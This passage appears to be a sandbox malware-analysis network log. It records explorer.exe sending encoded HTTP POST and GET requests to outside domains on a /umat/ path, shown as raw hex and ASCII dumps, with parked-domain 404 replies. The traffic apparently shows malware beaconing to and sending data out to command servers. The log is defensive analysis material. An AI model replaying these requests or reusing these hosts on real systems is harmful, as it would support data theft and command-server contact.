50 47 74 56 55 53 61 38 70 37 49 63 38 65 6a 2d 35 59 4a 76 72 55 75 55 6c 30 4b 65 6e 66 63 63 6a 4f 36 4f 53 51 72 76 56 37 77 35 59 47 57 56 46 61 50 6e 6e 65 4b 53 34 4d 51 75 4d 70 70 45 49 72 4e 4a 28 38 35 46 72 32 4f 32 77 38 46 45 28 50 67 54 41 4c 75 5f 77 58 39 4c 79 68 4f 7a 69 71 72 62 52 2d 63 64 46 33 69 4c 58 72 55 46 76 48 78 50 41 33 5a 43 67 37 4d 38 45 69 50 32 4d 43 77 37 42 65 69 33 35 30 45 70 65 52 58 34 6d 4b 54 79 75 79 7e 32 45 35 41 49 41 53 64 48 6d 48 6e 56 48 76 7e 77 4f 70 79 7a 38 37 56 33 52 6b 77 76 53 59 31 32 70 77 75 5f 61 6e 57 63 4a 5f 4e 7a 58 35 66 4a 57 48 70 73 59 39 4b 63 6d 35 49 38 28 35 44 4c 63 33 35 71 57 4a 30 78 6c 34 62 66 65 70 4c 47 49 55 34 50 4a 34 33 7a 49 34 37 63 63 49 30 48 47 56 77 50 61 6f 66 79 56 53 67 46 54 37 34 4f 4d 34 39 59 33 74 55 49 45 31 43 35 49 65 36 4a 43 43 6b 54 44 47 44 75 78 67 32 56 4d 5a 4d 56 36 58 77 4d 57 38 66 58 64 39 31 75 77 57 4a 55 52 65 5a 47 38 43 35 4d 67 4a 41 6f 66 6a 39 30 32 45 59 4e 68 4a 57 51 50 75 51 53 30 33 41 71 64 65 54 4e 4a 67 77 34 4f 6a 7e 34 41 72 70 55 6e 66 50 4c 6d 55 52 51 36 58 48 74 4b 54 52 6f 31 45 78 32 35 42 44 57 69 39 52 32 69 6f 78 4a 76 67 37 39 57 33 67 39 51 65 43 52 51 34 49 78 5a 74 28 33 28 39 78 58 76 4f 32 58 56 71 57 5a 75 69 51 66 69 6d 51 44 4a 4b 6e 54 45 6d 36 47 37 78 79 6c 31 67 36 42 42 65 59 78 63 4e 65 57 76 6b 69 5f 68 36 71 59 52 70 4c 4e 67 49 61 6f 45 65 55 74 61 6c 38 6b 69 36 53 49 58 79 6b 4b 46 63 73 66 33 4e 6b 30 6a 39 34 6a 6b 32 44 5f 52 34 70 70 6e 74 45 6a 76 6c 4a 32 34 79 78 72 70 4e 6a 44 52 73 48 56 72 31 4f 2d 6e 41 46 59 32 79 57 34 47 78 46 6e 73 65 53 33 65 58 7e 49 77 32 48 49 6d 61 39 72 6d 74 32 6e 6a 58 73 63 77 77 79 6a 58 32 4c 36 69 42 78 64 51 4c 76 38 43 5f 38 77 76 4e 7a 61 66 56 65 57 5a 4f 6a 45 28 43 70 4a 73 69 39 45 4d 44 4e 66 54 66 49 6f 71 6b 28 55 53 4d 38 6f 37 41 63 72 53 58 42 42 76 76 6d 66 75 31 7e 4a 30 68 66 59 70 67 63 47 41 33 69 6a 63 4a 64 41 5a 38 4b 58 63 77 46 64 39 41 37 71 7e 7a 42 71 4e 45 51 50 68 6b 66 52 6e 32 64 35 38 66 41 49 50 44 28 75 50 64
                                                                                                          Data Ascii: bT7tPLpx=xiK5v-sOfjzyW9Lg5djvFt(VHYG615aYzJH4HlNHctE9v2mLmwvT5x~osS2G~BeA(vwkd_IePhzvsFec2YNPW3Rj69c-sAnLNpvvdZ5T8RH8Ph(KluGXcKj3sqTdBlf95FCtwooMs4yWmddCL5zYKzCWhuJjtdy7zMHeg9wjPT4NG30iWOsU2VJCBMRc8LsCHCiNi6kemacppOqQzXAj(3uQLXm-yk5OxkPmoWdHDuiN~-mldivSodWFIrgwKCr3HuM_WY29SuYRDhgaOP5Ka8YbzES9MAyYEgAEDjdXMXJKiVYNQNUQFD2dng799nmOXnBg~RyLasEbAs2m~CE3WFW0U_xpY3sxw846n33ix-jvZdvYgRHJDj9ILp8eV42K(XjIeMejkDUyG6zDK7QkIRYQH0g2PEK3iFY6Tw7PGQsQdUBQMPBTXtxbHalb0fQr05XzUFV33f2arO(mVeEXUTbC~Ey04IBR2f3ryLTCJb(-0OW5D-XX5EXjRs2p0RPBTxShbk4SDE9ZeNEcuzzF3xiIskmBO7~YzEwj51uywgZoqXpcj4FIrMfZfDgGX62wB5ldAB5X7zJFVcSPKF(DerC5PCwNbQWyBQFE1wMR9XwKMWtxBADP7mMbMawS(FVbh2W5adqfSAfjazljnqkTPGtVUSa8p7Ic8ej-5YJvrUuUl0KenfccjO6OSQrvV7w5YGWVFaPnneKS4MQuMppEIrNJ(85Fr2O2w8FE(PgTALu_wX9LyhOziqrbR-cdF3iLXrUFvHxPA3ZCg7M8EiP2MCw7Bei350EpeRX4mKTyuy~2E5AIASdHmHnVHv~wOpyz87V3RkwvSY12pwu_anWcJ_NzX5fJWHpsY9Kcm5I8(5DLc35qWJ0xl4bfepLGIU4PJ43zI47ccI0HGVwPaofyVSgFT74OM49Y3tUIE1C5Ie6JCCkTDGDuxg2VMZMV6XwMW8fXd91uwWJUReZG8C5MgJAofj902EYNhJWQPuQS03AqdeTNJgw4Oj~4ArpUnfPLmURQ6XHtKTRo1Ex25BDWi9R2ioxJvg79W3g9QeCRQ4IxZt(3(9xXvO2XVqWZuiQfimQDJKnTEm6G7xyl1g6BBeYxcNeWvki_h6qYRpLNgIaoEeUtal8ki6SIXykKFcsf3Nk0j94jk2D_R4ppntEjvlJ24yxrpNjDRsHVr1O-nAFY2yW4GxFnseS3eX~Iw2HIma9rmt2njXscwwyjX2L6iBxdQLv8C_8wvNzafVeWZOjE(CpJsi9EMDNfTfIoqk(USM8o7AcrSXBBvvmfu1~J0hfYpgcGA3ijcJdAZ8KXcwFd9A7q~zBqNEQPhkfRn2d58fAIPD(uPda5tBnUYJW91luuVaFuRuYjcHb10UrbQoTfQ0TAVFUchVLg8IJsD30-KoPgqTFMfUBJavPg22Tg(Px1qvJnSkvYyrDgIgZycn~Z99iXiaHsdj9YrFCJmQdJk6k9A-h6qcD37bfdpN63okoeKmVhVGe8aHfi6rmEsncW3LNR0Olrn_uDXnku~AF4MbwwUwXlXUgNyQ0zIqwB6j7Oaj8v3WzkMlN6vZgQCaqhXtV6CNsS~dV0fuNEo3proxOCNh1JdUiTZW~FQ0L5OTEjZ1lZH8Vzx2pQHvyFl0ow3L0mGKmXoj8WMuCrvJJZOMmVf18kePldc-RuUYdKi8pw3YHAdFbJ88EaMaFE2Ef1KOj3Hf1usJx8ecrEQ7g85dgNO3pJA95P4EDX0CpBNJvTWomSBTHdNDQRd_dtrJzem47khIpjBzngUrojMC7fgzdRXffishD9tgLBbdgoCLbnDuL6Hm~IlHfsck6IEoKn0GE-SPC2MePAlJjDuE0n04Xtyu91efKZSg0eu8h3wiriFrvfzOX_JBo-3JYQvIUyxo2x1U94rmUMJKQlMq4irpdVFb2iVMGdMBJZ011mTdTNblawlQZAEq(4YF2PsqmJSWEyTouJ8qapnkvvxyfB7NMfNeBgIJMlrudKaNXPHKEG0C8ouojyJne0SZaIrjuxq-A6Z_TVSj2lFmqHatnqMAOfywh5ej32NsQPOdz9er5DuZHkuabEL440GHIzFJtmTzatro~jppow3YsY9EF1kVDnCaxYBBdlvWb49kWQqQ57vNgPpY3U0oqB0aIMzLk3GPdltkpJ(uiAzveFV4k5LgbCVYJuiSgMrgzgFtv5kQQ-xgc_ZwOOeXh0TdNeMzr5L8kbC1S1QN(uLpYNuO3E2lvqP5LeyfrNToGvQ9qXz4ZhFjK39j~NatrtR-gZoj6oxaomCwny2gPYpR2b(Q5XddB9D1KVH_fSOUhjepO0G0xA7rRpd30c8m6KmDVaBUU7lbvLS14XIWvjs97iibN_KaOT7nkS4R9vCzK8mGtSbVRCsiK2PQxL~SlgLOevN6wWPbcgwVsYAkLeRKfNao1EpTR25_1k9GGr3iGt5H0QZqRXnagtQRJRNDUvm7b9~Lofmi6MqdnPxIKN37qZKWJiAMOw7arbj72tmpUc16LnaamisEPuT6xdThtDgpeD~swgDEyC34YrLDsIiOQnfMu9fui6fKg11L9AAJO2wylXn9pSPXzP1xPdbMqPMtuw1_f8UmYNcG(hJvuooczsuZOWn4s-EQxte8axhv0N4Unrp-OhHoXAXCgCrMdDa6q85rBH4F5zXvkKpb8K5YLUncnD~nA_XQ4z(pwplrtEsTj7ddcyzRTgs5rBtLfch8C8XbxS6jOH92LDoZyIewkYmcGG0hX2cnHicuWMP_tjLQDOx-gW9TTw2K2LUPMJQ14sz2dC053Ln1kHWwNcdcdhnUuL2tbgphTcHYx4oX21S6mtBBd_8_vqWgwlo8~O0bl1axU6I_IPulZpSEsW3aq9ZliEgpC8cbS5dCAMkm8_07OdEXTa1tOtu528tflmZz7ocDj-8wxUZ4dufPC2Q6UjptbeopcCxSHd9AO7DFNf1mtPgd9qkNt5e2gBOKMpcZOPiOQ-UA5oFNquNv6g~te3uy(wGhyPG0oAov5H5DvwAAuJryCtXmXDDb5ORiWi(I884HdgqbXGhZKdk3~avTrgT58wPe4e1t5zQqeym_gOFKkJJkhrbcjC2Q7Ce-lwHptW166gNN81p3pJ7UsOvqWEB0GW5enIwkwK2zasyGOfz1njSFR22V6FOR(ZepJI91bPnnEzJUkGbc57sxLpMwPENNrU3w(IhzyymP(kiSbrS3rKYzFM(T9ORiEZwAnyJOmO47i2hMSY5i6TgoEzQ8h1Gq4xhy(DFrxCkgfUXq~B9fi-ZZpVLP(hVeE0WqP7eyJ-rxo9qeqdImucp2TSyiy2zgF-KGiR5mSZI2Aomv53bXO2BG2jm-0eprojf_qWZUtE0UK_gKTZwFCnM6PVJqHfKb(bpJiTcwLnbzd5pH2ipJ0CElLJKqQevZH5iSsloQ7x6gB1c7hWKueUKKVotyPOq6HuZtxrcbmtSh1QUy1akanG(8wCFk2XZvjT07cBRSc3u0nc0bx7ngIznRoFmPGxRaMOB9esOHw9eAvXk0R48EAJUmUR0Tapf5mVBHkeLFIeEXVyWIbSK_EXbiNNMxi1y5XTmpFa8YP8WiCKnoM6AgADZuTxRSJN6KMDTljlOBzggaz-~0L1AeCoMeZysoaYEruejuZGsxs1dJ5ienFi9Az6K3KmMi(k44Z8Ht64Hlkmf0d3~fwAp7eo2r21IaGHyAA_HaD_lzl3BXaQZa73wosjmbwlC-YzV6SUMRXn9r866vB_9QIMgV3h0ubLNWrTDTl6~iopTUt1A_UESWxPytaCidE5vH7pZQby8DAnwMDlkfVDkK0NhckPN77EAhbMcCUPWrxcHmpfnCoOkZeVb3dgEXcQZZwWhQokrsN-PL2OAMUrLzaP2JCHwQKKqT2hXFwb80mI9CwEhxhoQjNur2rzsX5-xrtwXP5Azw3VA7tWkosRsEeD6BmE(owJF7bojuewmGzLUPi92Zh3m_Aq7B6eXXkYFyI0RL2-P-2quDg2P5eTGarui_6kzuGUNHywwe3xd0wv1ERl0gVPcsKoDpxrvlxZq005kwaSe6Qzzq4OdV0yB
                                                                                                          Jun 3, 2022 08:17:37.436929941 CEST9727OUTData Raw: 66 4b 73 73 37 48 77 69 39 6a 28 72 58 74 42 77 50 51 6c 5f 56 30 58 6c 28 2d 72 36 35 51 5a 46 7a 4f 74 37 4e 71 46 66 53 4e 55 4d 32 6c 45 74 6d 5f 6c 75 6c 48 47 35 4d 64 30 44 6d 66 46 48 48 52 59 70 71 79 31 31 70 69 51 5f 38 75 4b 36 59 71
                                                                                                          Data Ascii: fKss7Hwi9j(rXtBwPQl_V0Xl(-r65QZFzOt7NqFfSNUM2lEtm_lulHG5Md0DmfFHHRYpqy11piQ_8uK6YqNQBqrmGLQ61FeyYWgcqf3kwRSKXowx9D0XIiMc3nZUewcgOTeVSBSHlv3PbHHoggROJlTaFTFXuTSztaH0kOjWUMj8419GGal4(lRZYNFMjN1rImIOgSegXf~GNHOb0ZGBhY0uBQzqjjgxlFAlRn9Nhp2Cf9Lq(S1
                                                                                                          Jun 3, 2022 08:17:37.436988115 CEST9742OUTData Raw: 4b 45 5a 39 44 63 45 51 68 33 4d 73 68 37 39 4d 64 68 47 36 42 6e 4e 46 4c 63 64 70 37 51 41 59 69 4a 70 38 37 65 28 41 39 63 52 46 31 51 52 36 4f 43 54 6c 6f 72 75 53 57 70 51 4e 46 67 70 76 30 55 53 6c 56 47 51 34 6d 50 76 31 54 71 4d 75 48 50
                                                                                                          Data Ascii: KEZ9DcEQh3Msh79MdhG6BnNFLcdp7QAYiJp87e(A9cRF1QR6OCTloruSWpQNFgpv0USlVGQ4mPv1TqMuHPHaIofvRpoYb4aIuW08(Q3LDUDgwbivIFPoQzUmNZ2DIfgNuFJ-tJEJQMVruqt_VRKT93knYHQvZ42SY3jTN04kjvE3pBwHOXPU1JuTi14XIOfm3cZPkCQo~85HShxsY3X0cDhXKAM37sab0vc8CFarpku95-xc9rX
                                                                                                          Jun 3, 2022 08:17:37.550848007 CEST9745INHTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 867
                                                                                                          Connection: close
                                                                                                          Server: Apache/2
                                                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Age: 0
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.44979166.96.162.13080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:37.438126087 CEST9743OUTGET /umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.408wmountain.info
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:17:37.549096107 CEST9744INHTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 867
                                                                                                          Connection: close
                                                                                                          Server: Apache/2
                                                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Age: 0
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          8192.168.2.449823198.44.241.2080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:48.809731960 CEST10586OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.huiyi-sui.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.huiyi-sui.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.huiyi-sui.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 37 57 4b 4b 64 35 46 45 55 64 5a 6f 58 66 42 41 57 37 66 37 49 41 6b 6c 62 42 7a 77 35 71 6b 4b 43 33 7a 51 78 42 50 5f 50 5a 41 33 54 31 64 38 79 42 4e 71 4d 51 4d 39 31 35 57 69 30 4e 46 73 4a 6c 71 67 68 42 41 59 49 45 32 78 42 66 52 64 44 48 7e 77 76 30 52 68 75 35 43 70 45 76 77 30 47 4c 32 79 54 39 76 4f 62 6c 48 56 31 39 31 43 75 64 71 4c 77 32 7e 48 76 55 48 50 42 31 56 34 51 4e 68 31 73 39 44 53 73 69 69 4f 32 37 28 61 73 49 65 4d 5a 77 6f 50 74 45 59 54 63 70 33 75 76 67 46 4c 6e 6c 79 30 67 74 48 55 55 36 67 4d 62 65 42 5f 38 36 78 34 61 4f 33 37 34 2d 52 61 4c 6a 72 70 39 49 34 73 76 4f 65 36 28 56 4a 69 77 7a 4d 5f 6b 4b 47 37 4d 32 6d 4b 69 67 69 55 35 37 48 78 77 66 6b 6a 46 46 4b 6d 56 67 73 70 6e 57 37 39 36 54 34 62 28 41 71 4a 57 4d 54 6b 48 36 71 61 71 6a 4f 41 33 36 45 4d 4d 38 58 79 49 38 33 6d 30 4e 79 50 7e 6e 33 53 4c 43 49 4a 4d 63 79 54 41 59 34 55 5a 49 38 77 39 4c 53 4c 61 5a 4c 53 55 33 51 2d 35 34 67 52 77 6c 79 49 51 75 44 54 4f 52 43 44 52 39 53 66 66 4d 54 39 39 41 56 54 37 55 7e 66 52 55 4f 41 68 6b 64 66 44 6f 64 6b 58 61 39 54 49 4b 30 4c 6d 5a 54 70 48 6f 50 66 64 39 64 38 31 45 6a 33 32 5a 49 6e 37 43 53 69 72 50 50 77 59 61 32 55 35 4e 6d 55 39 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: bT7tPLpx=7WKKd5FEUdZoXfBAW7f7IAklbBzw5qkKC3zQxBP_PZA3T1d8yBNqMQM915Wi0NFsJlqghBAYIE2xBfRdDH~wv0Rhu5CpEvw0GL2yT9vOblHV191CudqLw2~HvUHPB1V4QNh1s9DSsiiO27(asIeMZwoPtEYTcp3uvgFLnly0gtHUU6gMbeB_86x4aO374-RaLjrp9I4svOe6(VJiwzM_kKG7M2mKigiU57HxwfkjFFKmVgspnW796T4b(AqJWMTkH6qaqjOA36EMM8XyI83m0NyP~n3SLCIJMcyTAY4UZI8w9LSLaZLSU3Q-54gRwlyIQuDTORCDR9SffMT99AVT7U~fRUOAhkdfDodkXa9TIK0LmZTpHoPfd9d81Ej32ZIn7CSirPPwYa2U5NmU9g).


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          9192.168.2.449824198.44.241.2080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:49.017874002 CEST10594OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.huiyi-sui.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.huiyi-sui.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.huiyi-sui.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 37 57 4b 4b 64 38 46 53 66 39 39 78 64 76 4e 7a 59 6f 76 76 48 51 30 6e 65 78 33 46 7a 4c 59 56 47 47 44 75 38 67 7e 50 4f 59 35 7a 58 46 42 52 28 69 38 33 4d 55 41 51 74 36 79 2d 7e 39 5a 7a 4a 6c 43 43 68 42 45 59 4c 45 65 68 43 34 64 7a 44 6b 57 7a 72 55 51 59 76 35 43 30 41 74 55 56 47 4c 43 51 54 39 6e 65 62 51 62 56 31 62 78 43 6f 65 79 51 7e 32 7e 46 6e 30 57 65 46 30 70 50 51 4e 34 67 73 5f 6e 53 73 54 65 4f 77 61 50 46 6c 76 79 50 55 41 6f 57 71 45 5a 44 56 4a 36 49 76 67 41 65 6e 6c 4f 30 67 66 6a 55 56 71 41 4d 54 50 42 2d 7a 71 78 48 65 4f 33 38 76 75 64 4c 4c 69 48 6c 39 4e 41 38 36 71 57 36 7e 6c 4a 68 6d 77 63 42 79 4a 44 35 41 58 53 74 69 67 75 74 35 4b 61 33 77 61 55 6d 4d 57 53 64 4a 53 31 38 6e 56 58 58 35 7a 34 58 6e 51 71 6f 57 4d 53 62 48 36 72 37 71 67 6d 41 33 37 63 4d 44 37 62 79 4a 63 33 6c 36 74 79 4a 35 6e 33 5a 50 43 45 33 4d 64 58 45 41 59 67 69 61 36 34 77 76 4c 43 4c 4c 70 33 52 56 6e 51 6b 7a 59 67 77 30 6c 79 54 51 75 43 32 4f 55 32 54 52 4b 79 66 4e 4a 28 39 74 79 39 54 38 6b 7e 66 64 30 4f 43 36 55 5a 78 44 73 78 6f 58 62 67 6d 49 35 34 4c 6e 50 48 70 48 4d 62 66 66 4e 64 38 34 6b 69 32 78 61 74 31 36 51 37 56 6d 76 33 33 52 75 6e 6d 79 4a 37 76 67 73 66 47 77 74 7a 62 4a 57 31 72 71 49 41 32 47 74 65 71 28 77 6f 53 52 30 55 67 4c 75 42 55 52 55 4e 55 49 66 48 35 30 54 6a 66 35 46 68 65 53 58 56 37 33 53 4c 45 39 75 57 58 7e 56 51 4d 6c 69 62 47 44 52 48 41 7a 35 33 4a 32 4f 7e 